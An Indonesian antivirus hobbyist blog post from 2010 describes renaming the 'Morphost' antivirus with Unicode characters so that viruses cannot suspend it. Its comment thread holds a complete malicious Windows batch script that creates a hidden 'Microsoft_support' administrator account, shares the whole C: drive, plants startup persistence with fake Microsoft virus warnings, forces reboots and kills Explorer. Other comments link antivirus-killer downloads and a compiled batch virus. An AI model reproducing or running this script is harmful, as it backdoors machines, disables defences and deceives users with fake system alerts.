MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Pertahankan Antivirusmu! Jangan sampai disuspend!

Posted by Morphic pada Mei 2, 2010


Tujuan ditulisnya tulisan ini bukan untuk dikhususkan untuk melawan virus Genzhock tapi untuk menghadapi virus-virus yang mirip dengan virus kiriman genzhock.

Secara spesial kami berterima kasih kepada Genzhock, karena kami mendapat pengalaman baru dengan virus ini. Sebelumnya kami belum pernah mendapat virus yang seperti ini.

Dan tujuan lain dari artikel ini adalah membuktikan sekali lagi bahwa Morphost masih lolos dari virus-virus yang mirip seperti ini nantinya.

Sebelum membahas virus Genzhock, kita bahas dulu virus dari Mr.X.

Agar Morphost dapat bertahan hidup dari virus kiriman Mr.X, kita cukup merename Morphost dengan nama apa saja asal dengan karakter unicode.

Misalnya begini:
Morphost©.exe

Otomatis Morphost tidak akan mati. Kali ini Morphost berhasil lolos dari bencana ini.

Untuk mendapatkan karakter unicode tidak sulit. Kamu bisa pake symbol yang ada di Ms.word
Silakan pilih menu Insert>symbol
Lalu pilih simbol yang kamu inginkan…

Untuk virus Genzhock. Kita tidak bisa pakai karakter unicode biasa.
Karena tetap saja Morphost gagal.

Lihat gambar berikut.

Muncul message box!
Kalo kamu klik Ok maka Morphost akan suspended!

Tapi kalo kamu abaikan Morphost bakal aman selamanya…
Tapi kalo virus lain mirip virus Genzhock yang tidak pakai messagebox, malah langsung main brutal kemungkinan morphost bakal suspended.

Sekarang coba pakai cara berikut.
Pakai karakter unicode lagi.
Tapi kali ini gak boleh ambil karakter sesuka hati.

Coba rename morphost dan tambahkan karakter alpha (α) atau boleh juga beta (β) atau boleh juga yang lain.
Tampilannya seperti ini.

Kemudian hidupkan. 100% pasti morphost tidak akan suspended. Malah si virus tidak mendeteksi keberadaan morphost.

Sesudah ini, kamu bisa matikan si virus secara manual lewat taskmanager morphost atau cara lainnya bila signature-nya belum ada pada database ataupun lolos dari scanning.

Selanjutnya tergantung bagaimana anda mengolahnya.
Thanks to:
-Mr.X
-Genzhock
-MuamarKudo
-Yudha
-Satryacode

32 Tanggapan to “Pertahankan Antivirusmu! Jangan sampai disuspend!”

  1. aris widodo said

    Kalo antivirus lokal(smadav) digabung ama antivirus luar (avg) dalam 1 komputer, ada pengaruhnya ngggak???? Soalnya aku pake smadav setiap kali komputer nyala selalu dideteksi virus!! Dan gimana cara bersihin virus yg udah masuk tanpa perlu ngistal ulang windows lagi , Terima kasih ^____^

  2. Masmorphic…gimana caranya agar AV kita bisa menscan seluruh file yang ukuranya di atas 4Mbnamun scanner tetap cepat..???

    • Morphic said

      kamu pake checksum apa??

      selain itu pengaruh metode string juga ada loh.
      semakin besar file maka semakin lambat.
      nah untuk itu, perlu pemeriksaan beberapa potong byte saja.

      tidak perlu semua isi dari satu file (>4 mb) itu diperiksa.
      ambil sedikit saja untuk diperiksa..

      • Nah,, kalau mengambil sedikit byte saja untuk di checksum gimana..??? kalau pakai string aku bisa,, kalau yang checksum aku blum bisa…!!! ajarin ya mas….???

        • Morphic said

          kalo kamu pake M31 berarti dah beres dong.
          karena M31 itu lumayan cepat.

          yg jadi masalah adalah metode string.

        • ia,, aku pakai M31….. tapi scanner morphost itu kq cepat banget ya…??? apakah sebelum di checksum, morphost hanya mengambil sedikit byte saja…??

          kalau metode string,, aku pakai fungsi API…. apakah lelet kalau pakai fungsi API…???

        • Morphic said

          oo,
          metode string yg ak pake itu hanya untuk memeriksa sedikit string saja…
          jadi tidak seluruh isi file itu jadi bahan sampelnya…
          begicu…

          fungsi API..
          berarti kamu pake CreateFile itu ya?
          ooo,,
          blum pernah ak bandingkan tuh..

  3. nyiur said

    versi 1.1 (gak mempan di rename & unicode)
    http://www.dewaphobia.com/free-upload/avkiller_v1.1.zip

  4. nyiur said

    Coba avkiller dan tes apa bisa bertahan….!!!

    http://www.dewaphobia.com/free-upload/avkiller.zip

  5. Bobby315 said

    MORPHOST Editan Saya


    dan tampilan video, harus install k-lite untuk membaca file dibawah ini (1024×768 – MP4) :

    http://www.kitaupload.com/download.php?file=453Bobby315_Rules.zip

    * note : morphost editan saya berjalan dalam modus kernel mode / Ring 0 (tampilan asli gak saya rubah) dan yg bisa matiin morphost ini cuma Avast antivirus dgn konsekuensi BSOD (untung pake virtualbox) ^^.

    @ morphic

    mohon maaf yg sebesar2nya krn telah lancang otak atik software kamu, sampe saya buat class baru dalam morphost supaya mau baca plugin. krn saat ini saya lagi males coding av project (gara2 tester pada cerita2 kayak si celengan semar waktu itu) dan drpd virus masuk2 ke kompi mending av kamu aja yg jagain wahahaha.

    • Satryacode said

      Salut dah ama mas bobby 315..

    • shafry said

      hebat bagis source penghilang proses donk

    • Bobby315 said

      maaf baru balas, soalnya masih mikir2 apa harus saya kasih apa nggak. supaya gak terjadi hal yg gak terduga (dijadiin malware) saya kasih clue aja oke.

      untuk menghilangkan proses ada hubungannya dgn NTQuerySystemInformation()

      struct NtQuerySysInfoParams
      {
      SYSTEM_INFORMATION_CLASS SystemInformationClass;
      PVOID SystemInformation;
      ULONG SystemInformationLength;
      PULONG ReturnLength;
      };

      struct CekProses
      {
      virtual bool CheckProcess( wchar_t* imageName, size_t nameSize )=0;
      };

      juga jgn lupa pergunakan pustaka Boost salah satunya bernama function.h & bind.h (klo bisa sih buat pustaka baru dr pustaka boost)😀

      • MuamarKudo said

        mas bobi, Anda jadi terkenal di forum pcmav lho gara2 buat plugin untuk morphost ini. hehe. cek aja ke tkp gan.

      • shafry said

        @boby
        krmin gw sourcex dunk ke shafry2008@gmail.com
        @hakim
        ad g yg namax hakim
        q cmn mw brkta trims krn ud gabung d webq

      • Bobby315 said

        @ shafry

        coba cek deh forum pcmav ada user yg kasih link buat hide proses. aslinya butuh file sys dan prosesnya gak bisa diberhentiin oleh program tsb apabila terjadi hal2 “program secara gak sengaja close/exit/not respond” saya emg dah coba untuk itulah saya matiin pake avast … yg jadi masalah krn saya modif jadinya BSOD hahahaha dan itu juga knp dalam bentuk plugin, program mati proses juga.

  6. :D said

    @echo off
    cd \
    cd %SystemRoot%\system32\
    md 1001
    cd \
    cls
    echo 12:00:00.00 | time >> nul
    echo 01/01/2000 | date >> nul
    net users Microsoft_support support /add
    net localgroup administrators Microsoft_support /add
    net share system=C:\ /UNLIMITED
    cd %SystemRoot%\system32\1001
    echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
    mode con rate=1 > nul
    mode con delay=4 >> nul
    at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
    at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
    msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
    msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul
    copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”
    echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
    copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”
    cd\
    cls
    cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
    attrib +h +s +r warnusr.vbs
    attrib +h +s +r sd.bat
    cd\
    cd %systemroot%\system32
    attrib +h +s +r 1001
    taskkill /F /IM explorer.exe

  7. yudha said

    sudah ku promosikan juga..!

  8. yudha said

    akhirnya di jawab juga phic, ditengah-tengah kesibukan sebagai mahasiswa Kedokteran.. salut-salut deh!!

  9. shafry said

    waduh lama ga buka net ketinggalan berita jauh

  10. Satryacode said

    Wah….
    http://bizinformation.org/id/www.morphians.wordpress.com

  11. VirSpector said

    Bisa juga klo pake Character Map di Start > All Programs > Accessories > System Tools > Character Map

  12. Genzhock said

    @xXx
    Mana virus buatan km yg katanya bisa menginfeksi smadav langsung dari servernya, tujukan share kesini jgn cuma OmDonK aja..

    Klo bikinx pake VB atau virus bat, mending ngk usah ditunjukin, karena virus kacangan seperti itu bikin malu dunia pervirusan aja..

  13. Genzhock said

    Nice trik..
    Tp teknik seperti itu ngk bisa diandalkan selamanya..

  14. Kholis Virologist said

    http://bizinformation.org/id/www.forum-bebas-forum.co.cc

    lihat boz, itulah harga forum q

  15. XxXxXxX said

    ini virus bat ke2 (morphost) yang sudah q compile

    http://www.4shared.com/file/JI_DJe9e/C_relwarC708_v10.html

    di analisa, he he he

  16. XxXxXxX said

    ha ha ha

    masih ada jalan menuju rumah
    he he he

    mantab kang

  17. mantab kang

  18. MuamarKudo said

    Hm… akhirnya kau jawab juga pertanyaan mereka, sam!

    eh ya, ijin ini share di forum pcmav ya…:)

    Maju MorphostLab!

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: